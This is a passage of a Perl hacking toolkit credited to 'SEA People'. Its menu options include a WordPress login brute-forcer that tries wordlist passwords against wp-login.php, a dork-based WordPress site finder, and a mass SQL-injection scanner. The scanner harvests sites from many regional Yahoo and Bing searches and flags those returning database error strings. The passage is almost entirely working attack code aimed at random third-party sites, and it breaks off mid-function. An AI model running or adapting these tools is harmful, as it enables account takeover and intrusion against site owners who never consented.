1386. use HTTP::Request::Common qw(POST);
1387. use HTTP::Cookies;
1388.  
1389. if($^O =~ /Win/){
1390. system("cls");
1391. }else{
1392. system("clear");
1393. }
1394. $ua = LWP::UserAgent->new(keep_alive => 1);
1395. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
1396. $ua->timeout (20);
1397. $ua->cookie_jar(
1398. HTTP::Cookies->new(
1399. file => 'cookies.txt',
1400. autosave => 1
1401. )
1402. );
1403.  
1404. $target = $ARGV[0];
1405. $user = $ARGV[1];
1406. $wordlist = $ARGV[2];
1407. $wpsub = 'wp-submit';
1408. $redirect = 'http://'.$target.'/wp-admin/';
1409. print "
1410. Wordpress Bruteforce
1411. ^__^
1412. (oo)\_________
1413. (__)\Wordpress)\/\
1414. ||-----w |
1415. SEA People Here!! || ||
1416. \n ======================================================
1417. =======================================================\n";
1418. chomp $target;
1419.  
1420. print "[+] Enter Wordpress Site: ";
1421. chomp ($target = <STDIN>);
1422. chomp $user;
1423.  
1424. print "[+] Enter Wordpress User: ";
1425. chomp ($user = <STDIN>);
1426. chomp $dork;
1427.  
1428. print "[+] Enter Wordlist: ";
1429. chomp ($wordlist = <STDIN>);
1430. if ($target !~ /^http:\/\//){
1431. print q(
1432. Wordpress Bruteforce
1433. Contact me at : amiralbenz<at>gmail.com
1434. sea People Here!!
1435. );
1436. $target = 'http://' . $target;
1437. }
1438. if ($target !~ /\/wp-login.php/){
1439. $target = $target . '/wp-login.php';
1440. }
1441. $notpon = "\n[-] 404 wordlist not found!! \n";
1442. open(a,"<$wordlist") or die "$notpon";
1443. print "\nBruteforce info....
1444. \nSite : $target
1445. \nUsername : $user
1446. \nWordlist : Found!\n
1447. [+] Bruteforce In Action....\n\n";
1448. sleep(2);
1449. while(<a>){
1450. chomp($_);
1451.  
1452. my $response
1453. = $ua->post($target,
1454. { log => $user,
1455. pwd => $_,
1456. $wpsub => 'Log in',
1457. redirect_to => $redirect,
1458. testcookie => '1'
1459. });
1460.  
1461. my $code = $response->code;
1462. print "[?] Testing $_.....\n";
1463. if ($code == 403){
1464. print "\n\n\t[-] Access Forbidden!!\n";
1465. print "\t---==SEA People Here==--- \n\n";
1466. exit;
1467. }
1468. if($code == 302){
1469. print "\n\n\t[*] PASSWORD FOUND: $_\n";
1470. print "\t---==SEA People Here==--- \n\n";
1471. exit;
1472. }
1473. print "[-] Failed!!\n";
1474. }
1475. print "[-] Bruteforce failed!!
1476. \n[!] Your wordlist is sucks!!\n";
1477. exit;
1478. }}
1479. if($targett eq '13')
1480. {
1481. system('cls');
1482. system('title Wordpress Site Finder');
1483. {
1484. use HTTP::Request;
1485. use LWP::UserAgent;
1486. use HTTP::Request::Common qw(POST);
1487. use HTTP::Request::Common qw(GET);
1488. use IO::Socket;
1489. use Socket;
1490. use POSIX qw(strftime);
1491.  
1492. if($^O =~ /Win/){
1493. system("cls");
1494. }else{
1495. system("clear");
1496. }
1497.  
1498. $dork = $ARGV[0];
1499. my %hosts;
1500. my $time =localtime();
1501. print"
1502. WordPress Site finder
1503. ^__^
1504. (oo)\________
1505. (__)\ Scan )\/\
1506. ||----w |
1507. SEA People Here!! || ||
1508. perl $0 <dork> \n";
1509. chomp $dork;
1510.  
1511. print "[+] Enter Wordpress Dork: ";
1512. chomp ($dork = <STDIN>);
1513. print q(
1514. WordPress site finder
1515. Contact me at : <at>gmail.com
1516. SEA People Here!!
1517. );
1518. print "\n[!]Scanning info
1519. [!]Localtime : $time
1520. [!]Scanning using : $dork
1521. [!]Scanning started.....\n";
1522. #Search Engine
1523. my @bing = &bing($dork);
1524. print "\n[+] Get ".scalar(@bing)." Sites \n";
1525. push(my @tot, @bing);
1526. my @puliti=&unici(@tot);
1527. print "\n[+] Find ".scalar(@tot)." Sites and Cleaned : ".scalar(@puliti)." for $dork \n";
1528. my $uni=scalar(@puliti);
1529. foreach my $sito (@puliti)
1530. {
1531. $contatore++;
1532. if ($contatore %30==0){
1533. print "\n[?] Checking ".$contatore." of ".$uni. " Sites \n";
1534. }
1535. if ($contatore==$uni-1){
1536. print "\n[!] Scan finish for $dork \n";
1537. }
1538. my $wp="http://".$sito;
1539. my $req=HTTP::Request->new(GET=>$wp);
1540. my $ua = LWP::UserAgent->new(keep_alive => 1);
1541. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12","Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4","Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5","Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1","Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9","Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5","Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3");
1542. $ua->timeout(10);
1543. my $response=$ua->request($req);
1544. #You can add the wordpress search here
1545. if ($response->is_success) {
1546. if( $response->content =~ /Powered by WordPress/ ||
1547. $response->content =~ /Site by WordPress/ ||
1548. $response->content =~ /WordPress/ ||
1549. $response->content =~ /wordpress/ ||
1550. $response->content =~ /WORDPRESS/ ||
1551. $response->content =~ /Theme by/ ||
1552. $response->content =~ /Site Theme by/ ||
1553. $response->content =~ /WordPress Theme by/ ||
1554. $response->content =~ /Copyright Theme/ ||
1555. $response->content =~ /Theme for WordPress/ ||
1556. $response->content =~ /Blog pada WordPress.com/ ||
1557. $response->content =~ /Blog at WordPress.com/ ||
1558. $response->content =~ /The Morning After Theme/ ||
1559. $response->content =~ /The Twenty Ten Theme/ ||
1560. $response->content =~ /Proudly powered by WordPress/ ||
1561. $response->content =~ /Plainbox Theme/ ||
1562. $response->content =~ /Wordpress Theme/ ||
1563. $response->content =~ /Modicus Remix Theme/ ||
1564. $response->content =~ /Nishita Photo Blog Theme/ ||
1565. $response->content =~ /Theme by MyThemeShop/ ||
1566. $response->content =~ /Theme by/ ||
1567. $response->content =~ /Futurosity Aperio Prototype/ ||
1568. $response->content =~ /Get the Theme for Free/ ||
1569. $response->content =~ /Brightness Theme/ ||
1570. $response->content =~ /Noname Theme/ ||
1571. $response->content =~ /Overstand Theme/ ||
1572. $response->content =~ /Disire Portfolio/ ||
1573. $response->content =~ /Delicacy Food/ ||
1574. $response->content =~ /Diary Theme/ ||
1575. $response->content =~ /Facebook Theme/ ||
1576. $response->content =~ /NuBlue Theme/ ||
1577. $response->content =~ /GreenLife Theme/ ||
1578. $response->content =~ /JEEZ Business Theme/ ||
1579. $response->content =~ /Favor HD Magazine Theme/ ||
1580. $response->content =~ /Mason Jar Theme/ ||
1581. $response->content =~ /Radion Theme/ ||
1582. $response->content =~ /Clearly Theme/ ||
1583. $response->content =~ /Kreativo Theme/ ||
1584. $response->content =~ /My Baby Theme/ ||
1585. $response->content =~ /Design Agency Theme/ ||
1586. $response->content =~ /Isabelle Theme/ ||
1587. $response->content =~ /Cotton Theme/ ||
1588. $response->content =~ /ProjectFlow Theme/ ||
1589. $response->content =~ /WordPress.com/ ||
1590. $response->content =~ /Free Theme by/ ||
1591. $response->content =~ /Paid Theme by/ ||
1592. $response->content =~ /Get Free Theme/ ||
1593. $response->content =~ /Get Paid Theme/ ||
1594. $response->content =~ /Oleh WordPress/ ||
1595. $response->content =~ /INDEX OF/ ||
1596. $response->content =~ /Plugins WordPress/ ||
1597. $response->content =~ /readme.html/ ||
1598. $response->content =~ /WordPress version 3.3.1/ ||
1599. $response->content =~ /WordPress version 3./ ||
1600. $response->content =~ /WordPress site/ ||
1601. $response->content =~ /Get Theme/ ||
1602. $response->content =~ /Blog at Word/ ||
1603. $response->content =~ /WordPress/){
1604. my $hs=geths($print); $hosts{$hs}++;
1605. if($hosts{$hs}=="1","2","3","4","5","6","7","8","9","10"){
1606. print "\n[+] Positive Wordpress site : $wp \n";
1607. }}
1608. elsif($re =~ /not found/ ||
1609. $re =~ /404 NOT FOUND/ ||
1610. $re =~ /Not Found/ ||
1611. $re =~ /NOT FOUND/ ||
1612. $re =~ /404/ ||
1613. $re =~ /Error/ ||
1614. $re =~ /error/ ||
1615. $re =~ /ERROR/ ||
1616. $re =~ /Page Not Found/)
1617. {
1618. my $hs=geths($print); $hosts{$hs}++;
1619. if($hosts{$hs}=="1","2","3","4","5","6","7","8","9","10"){
1620. print "\n[-] Negative Wordpress site : $wp \n";
1621. }}
1622. }}
1623. print "\n\t\t --==SEA People Here==--\n";
1624. exit;
1625. #Sub Search Engine
1626. ################Bing
1627. sub bing() {
1628. my @lst;
1629. my $key = $_[0];
1630. for (my $b=0; $b<=300; $b+=300) {
1631. my $go = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$b."&FORM=PERE");
1632. my $res = &query($go);
1633. if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$b=300;}
1634. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
1635. if ($1 !~ /bing\.com/) {
1636. my $k = $1;
1637. my @grep = &links($k);
1638. push(@lst,@grep);
1639. }
1640. }
1641. }
1642. return @lst;
1643. }
1644. ################################################
1645.  
1646. sub query($){
1647. my $url=$_[0];
1648. $url=~s/http:\/\///;
1649. my $host=$url;
1650. my $query=$url;
1651. my $page="";
1652. $host=~s/href=\"?http:\/\///;
1653. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1654. $query=~s/$host//;
1655. if ($query eq "") {$query="/";};
1656. eval {
1657. my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
1658. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
1659. my @r = <$sock>;
1660. $page="@r";
1661. close($sock);
1662. };
1663. return $page;
1664. }
1665.  
1666. sub unici{
1667. my @unici = ();
1668. my %visti = ();
1669. foreach my $elemento ( @_ )
1670. {
1671. next if $visti{ $elemento }++;
1672. push @unici, $elemento;
1673. }
1674. return @unici;
1675. }
1676.  
1677. sub geths(){
1678. my $host=$_[0];
1679. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1680. return $host;
1681. }
1682.  
1683. sub key(){
1684. my $chiave=$_[0];
1685. $chiave =~ s/ /\+/g;
1686. $chiave =~ s/:/\%3A/g;
1687. $chiave =~ s/\//\%2F/g;
1688. $chiave =~ s/&/\%26/g;
1689. $chiave =~ s/\"/\%22/g;
1690. $chiave =~ s/,/\%2C/g;
1691. $chiave =~ s/\\/\%5C/g;
1692. return $chiave;
1693. }
1694.  
1695. sub links()
1696. {
1697. my @l;
1698. my $link=$_[0];
1699. my $host=$_[0];
1700. my $hdir=$_[0];
1701. $hdir=~s/(.*)\/[^\/]*$/\1/;
1702. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1703. $host.="/";
1704. $link.="/";
1705. $hdir.="/";
1706. $host=~s/\/\//\//g;
1707. $hdir=~s/\/\//\//g;
1708. $link=~s/\/\//\//g;
1709. push(@l,$link,$host,$hdir);
1710. return @l;
1711. }
1712. }}
1713. if($targett eq '1x')
1714. {
1715. system('title About Me');
1716. print "Creator : amiral\n";
1717. print "Mail : amiral[at]hotmail[.]co[.]id | WhiteCode[at]gmail[.]com\n";
1718. print "Greetz : ./Mr wolf | ahmed | MAtter \n";
1719. print "Special Thanks to : ahmed | rache | SEA | \n";
1720. system("pause");
1721. }
1722. if($targett eq '12')
1723. {
1724. system('cls');
1725. system('title Sqli Scanner');
1726. {
1727. use HTTP::Request;
1728. use LWP::UserAgent;
1729. use IO::Socket;
1730. use Socket;
1731. use URI::Escape;
1732. use POSIX qw(strftime);
1733.  
1734. if ($^O =~ /Win/){
1735. system ('cls');
1736. }else{
1737. system ('clear');
1738. }
1739. my ($sec,$min,$hour,$day,$mon,$year,$wday,$yday,$isdst)=localtime();
1740. my $uagent = "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1";
1741. print q {
1742. SQLi scanner
1743. };
1744. print q(
1745. SQLi scanner
1746. );
1747. print "---------------------------------------------------------
1748. [!] Options
1749. [!] example
1750. [!] Dork : product.php?id= +site:il +you have an error in your sql
1751. ---------------------------------------------------------\n";
1752. print "[?] Dork for scanning : ";
1753. my $dork = <STDIN>;
1754. chomp $dork;
1755. $ngitung = 0;
1756. my %hosts;
1757. print "---------------------------------------------------------
1758. [!] Scanning info
1759. ---------------------------------------------------------
1760. [+] Time : $hour:$min:$sec
1761. [+] Dork : $dork
1762. ---------------------------------------------------------
1763. [!] Scanning started....
1764. ---------------------------------------------------------";
1765. #Search Engine
1766. my @bing = &bing($dork);
1767. print "\n[+] Bing get ".scalar(@bing)." Sites";
1768. my @irlandia = &irlandia($dork);
1769. print "\n[+] Irlandia get ".scalar(@irlandia)." Sites";
1770. my @indonesia = &indonesia($dork);
1771. print "\n[+] Indonesia get ".scalar(@indonesia)." Sites";
1772. my @thailand = &thailand($dork);
1773. print "\n[+] Thailand get ".scalar(@thailand)." Sites";
1774. my @argentina = &argentina($dork);
1775. print "\n[+] Argentina get ".scalar(@argentina)." Sites";
1776. my @singapura = &singapura($dork);
1777. print "\n[+] Singapura get ".scalar(@singapura)." Sites";
1778. my @malaysia = &malaysia($dork);
1779. print "\n[+] Malaysia get ".scalar(@malaysia)." Sites";
1780. my @vietnam = &vietnam($dork);
1781. print "\n[+] Vietnam get ".scalar(@vietnam)." Sites";
1782. my @rusia = &rusia($dork);
1783. print "\n[+] Rusia get ".scalar(@rusia)." Sites";
1784. my @czech = &czech($dork);
1785. print "\n[+] Czech get ".scalar(@czech)." Sites";
1786. my @belanda = &belanda($dork);
1787. print "\n[+] Belanda get ".scalar(@belanda)." Sites";
1788. my @australia = &australia($dork);
1789. print "\n[+] Australia get ".scalar(@australia)." Sites";
1790. my @brasil = &brasil($dork);
1791. print "\n[+] Brasil get ".scalar(@brasil)." Sites";
1792. my @kanada = &canada($dork);
1793. print "\n[+] Kanada get ".scalar(@kanada)." Sites";
1794. my @jerman = &jerman($dork);
1795. print "\n[+] Jerman get ".scalar(@jerman)." Sites";
1796. my @spanyol = &spanyol($dork);
1797. print "\n[+] Spanyol get ".scalar(@spanyol)." Sites";
1798. my @perancis = &perancis($dork);
1799. print "\n[+] Perancis get ".scalar(@perancis)." Sites";
1800. my @italia = &italia($dork);
1801. print "\n[+] Italia get ".scalar(@italia)." Sites";
1802. my @inggris = &inggris($dork);
1803. print "\n[+] Inggris get ".scalar(@inggris)." Sites";
1804. my @turki = &turki($dork);
1805. print "\n[+] Turki get ".scalar(@turki)." Sites";
1806. my @polandia = &polandia($dork);
1807. print "\n[+] Polandia get ".scalar(@polandia)." Sites";
1808. my @filipina = &filipina($dork);
1809. print "\n[+] Filipina get ".scalar(@filipina)." Sites";
1810. my @peru = &peru($dork);
1811. print "\n[+] Peru get ".scalar(@peru)." Sites";
1812. my @hongkong = &hongkong($dork);
1813. print "\n[+] Hongkong get ".scalar(@hongkong)." Sites";
1814. my @finlandia = &finlandia($dork);
1815. print "\n[+] Finlandia get ".scalar(@finlandia)." Sites";
1816. my @yunani = &yunani($dork);
1817. print "\n[+] Yunani get ".scalar(@yunani)." Sites";
1818. my @kolombia = &kolombia($dork);
1819. print "\n[+] Kolombia get ".scalar(@kolombia)." Sites";
1820. my @taiwan = &taiwan($dork);
1821. print "\n[+] Taiwan get ".scalar(@taiwan)." Sites";
1822. my @swiss = &swiss($dork);
1823. print "\n[+] Swiss get ".scalar(@swiss)." Sites";
1824. my @mexico = &mexico($dork);
1825. print "\n[+] Meksiko get ".scalar(@mexico)." Sites";
1826. my @korea = &korea($dork);
1827. print "\n[+] Korea get ".scalar(@korea)." Sites";
1828. my @india = &india($dork);
1829. print "\n[+] India get ".scalar(@india)." Sites";
1830. my @swedia = &swedia($dork);
1831. print "\n[+] Swedia get ".scalar(@swedia)." Sites";
1832. print "\n---------------------------------------------------------";
1833. print "\n[!] Searching vulnerable sites";
1834. print "\n[!] Please wait...\n";
1835. print "---------------------------------------------------------\n";
1836. push(my @tot, @bing, @irlandia, @indonesia, @thailand, @argentina, @singapura, @malaysia, @vietnam, @swedia, @rusia, @czech, @belanda,
1837. @australia, @brasil, @kanada, @jerman, @spanyol, @perancis, @italia, @inggris, @turki, @polandia, @filipina, @peru, @hongkong, @yunani,
1838. @finlandia, @kolombia, @taiwan, @swiss, @mexico, @korea, @india, @irlandia);
1839. my @bersih=&clean(@tot);
1840. my $akhir=scalar(@bersih);
1841. foreach my $situs (@bersih) {
1842. $ngitung++;
1843. if ($ngitung==$akhir-1){
1844. print "\n[!] Scan finish for $dork :D";
1845. }
1846. my $expl="http://".$situs."'";
1847. my $mysql = "MySQL";
1848. my $mssql = "MsSQL";
1849. my $msacc = "MsAcces";
1850. my $string = getcontent($expl);
1851. if ( $string =~ m/You have an error in your SQL syntax/i || $string =~ m/Query failed/i || $string =~ m/SQL query failed/i ){
1852. print "[*] MySQL vuln for SQLi on $situs\n";
1853. printlog ("
1854. Time : $hour:$min:$sec
1855. Site : $situs
1856. Database : $mysql\n");
1857. }
1858. elsif ( $string =~ m/ODBC SQL Server Driver/i || $string =~ m/Unclosed quotation mark/i || $string =~ m/Microsoft OLE DB Provider for/i ){
1859. print "[*] MsSQL vuln for SQLi on $vuln\n";
1860. printlog ("
1861. Time : $hour:$min:$sec
1862. Site : $situs
1863. Database : $mssql\n");
1864. }
1865. elsif ( $string =~ m/Microsoft JET Database/i || $string =~ m/ODBC Microsoft Access Driver/i ){
1866. print "[*] MsAcces vuln for SQLi on $vuln\n";
1867. printlog ("
1868. Time : $hour:$min:$sec
1869. Site : $situs
1870. Database : $msacc\n");
1871. }
1872. }
1873. exit;
1874. #Search Engine
1875. sub bing() {
1876. my @list;
1877. my $key = $_[0];
1878. for (my $i=1; $i<=200; $i+=10) {
1879. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
1880. my $res = &search_engine_query($search);
1881. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
1882. my $link = $1;
1883. if ($link !~ /google/) {
1884. my @grep = &links($link);
1885. push(@list,@grep);
1886. }
1887. }
1888. }
1889. return @list;
1890. }
1891.  
1892. sub indonesia() {
1893. my @list;
1894. my $key = $_[0];
1895. my $b = 0;
1896. for (my $i=1; $i<=200; $i+=100) {
1897. my $search = ("http://id.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1898. my $res = &search_engine_query($search);
1899. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1900. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1901. }
1902. }
1903. } return @list;
1904. }
1905.  
1906. sub india() {
1907. my @list;
1908. my $key = $_[0];
1909. my $b = 0;
1910. for (my $i=1; $i<=200; $i+=100) {
1911. my $search = ("http://in.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1912. my $res = &search_engine_query($search);
1913. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1914. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1915. }
1916. }
1917. } return @list;
1918. }
1919.  
1920. sub irlandia() {
1921. my @list;
1922. my $key = $_[0];
1923. my $b = 0;
1924. for (my $i=1; $i<=200; $i+=100) {
1925. my $search = ("http://ie.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1926. my $res = &search_engine_query($search);
1927. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1928. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1929. }
1930. }
1931. } return @list;
1932. }
1933.  
1934. sub korea() {
1935. my @list;
1936. my $key = $_[0];
1937. my $b = 0;
1938. for (my $i=1; $i<=200; $i+=100) {
1939. my $search = ("http://kr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1940. my $res = &search_engine_query($search);
1941. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1942. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1943. }
1944. }
1945. } return @list;
1946. }
1947.  
1948. sub thailand() {
1949. my @list;
1950. my $key = $_[0];
1951. my $b = 0;
1952. for (my $i=1; $i<=200; $i+=100) {
1953. my $search = ("http://th.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1954. my $res = &search_engine_query($search);
1955. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1956. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1957. }
1958. }
1959. } return @list;
1960. }
1961.  
1962. sub argentina() {
1963. my @list;
1964. my $key = $_[0];
1965. my $b = 0;
1966. for (my $i=1; $i<=200; $i+=100) {
1967. my $search = ("http://ar.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1968. my $res = &search_engine_query($search);
1969. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1970. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1971. }
1972. }
1973. } return @list;
1974. }
1975.  
1976. sub singapura() {
1977. my @list;
1978. my $key = $_[0];
1979. my $b = 0;
1980. for (my $i=1; $i<=200; $i+=100) {
1981. my $search = ("http://sg.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1982. my $res = &search_engine_query($search);
1983. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1984. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1985. }
1986. }
1987. } return @list;
1988. }
1989.  
1990. sub malaysia() {
1991. my @list;
1992. my $key = $_[0];
1993. my $b = 0;
1994. for (my $i=1; $i<=200; $i+=100) {
1995. my $search = ("http://malaysia.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1996. my $res = &search_engine_query($search);
1997. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1998. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1999. }
2000. }
2001. } return @list;
2002. }
2003.  
2004. sub vietnam() {
2005. my @list;
2006. my $key = $_[0];
2007. my $b = 0;
2008. for (my $i=1; $i<=200; $i+=100) {
2009. my $search = ("http://vn.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2010. my $res = &search_engine_query($search);
2011. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2012. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2013. }
2014. }
2015. } return @list;
2016. }
2017.  
2018. sub swedia() {
2019. my @list;
2020. my $key = $_[0];
2021. my $b = 0;
2022. for (my $i=1; $i<=200; $i+=100) {
2023. my $search = ("http://se.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2024. my $res = &search_engine_query($search);
2025. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2026. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2027. }
2028. }
2029. } return @list;
2030. }
2031.  
2032. sub rusia() {
2033. my @list;
2034. my $key = $_[0];
2035. my $b = 0;
2036. for (my $i=1; $i<=200; $i+=100) {
2037. my $search = ("http://ru.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2038. my $res = &search_engine_query($search);
2039. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2040. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2041. }
2042. }
2043. } return @list;
2044. }
2045.  
2046. sub czech() {
2047. my @list;
2048. my $key = $_[0];
2049. my $b = 0;
2050. for (my $i=1; $i<=200; $i+=100) {
2051. my $search = ("http://cs.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2052. my $res = &search_engine_query($search);
2053. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2054. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2055. }
2056. }
2057. } return @list;
2058. }
2059.  
2060. sub belanda() {
2061. my @list;
2062. my $key = $_[0];
2063. my $b = 0;
2064. for (my $i=1; $i<=200; $i+=100) {
2065. my $search = ("http://nl.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2066. my $res = &search_engine_query($search);
2067. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2068. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2069. }
2070. }
2071. } return @list;
2072. }
2073.  
2074. sub australia() {
2075. my @list;
2076. my $key = $_[0];
2077. my $b = 0;
2078. for (my $i=1; $i<=200; $i+=100) {
2079. my $search = ("http://au.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2080. my $res = &search_engine_query($search);
2081. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2082. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2083. }
2084. }
2085. } return @list;
2086. }
2087.  
2088. sub brasil() {
2089. my @list;
2090. my $key = $_[0];
2091. my $b = 0;
2092. for (my $i=1; $i<=200; $i+=100) {
2093. my $search = ("http://br.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2094. my $res = &search_engine_query($search);
2095. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2096. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2097. }
2098. }
2099. } return @list;
2100. }
2101.  
2102. sub canada() {
2103. my @list;
2104. my $key = $_[0];
2105. my $b = 0;
2106. for (my $i=1; $i<=200; $i+=100) {
2107. my $search = ("http://ca.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2108. my $res = &search_engine_query($search);
2109. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2110. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2111. }
2112. }
2113. } return @list;
2114. }
2115.  
2116. sub jerman() {
2117. my @list;
2118. my $key = $_[0];
2119. my $b = 0;
2120. for (my $i=1; $i<=200; $i+=100) {
2121. my $search = ("http://de.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2122. my $res = &search_engine_query($search);
2123. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2124. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2125. }
2126. }
2127. } return @list;
2128. }
2129.  
2130. sub spanyol() {
2131. my @list;
2132. my $key = $_[0];
2133. my $b = 0;
2134. for (my $i=1; $i<=200; $i+=100) {
2135. my $search = ("http://es.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2136. my $res = &search_engine_query($search);
2137. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2138. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2139. }
2140. }
2141. } return @list;
2142. }
2143.  
2144. sub perancis() {
2145. my @list;
2146. my $key = $_[0];
2147. my $b = 0;
2148. for (my $i=1; $i<=200; $i+=100) {
2149. my $search = ("http://fr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2150. my $res = &search_engine_query($search);
2151. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2152. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2153. }
2154. }
2155. }
2156. return @list;
2157. }
2158.  
2159. sub italia() {
2160. my @list;
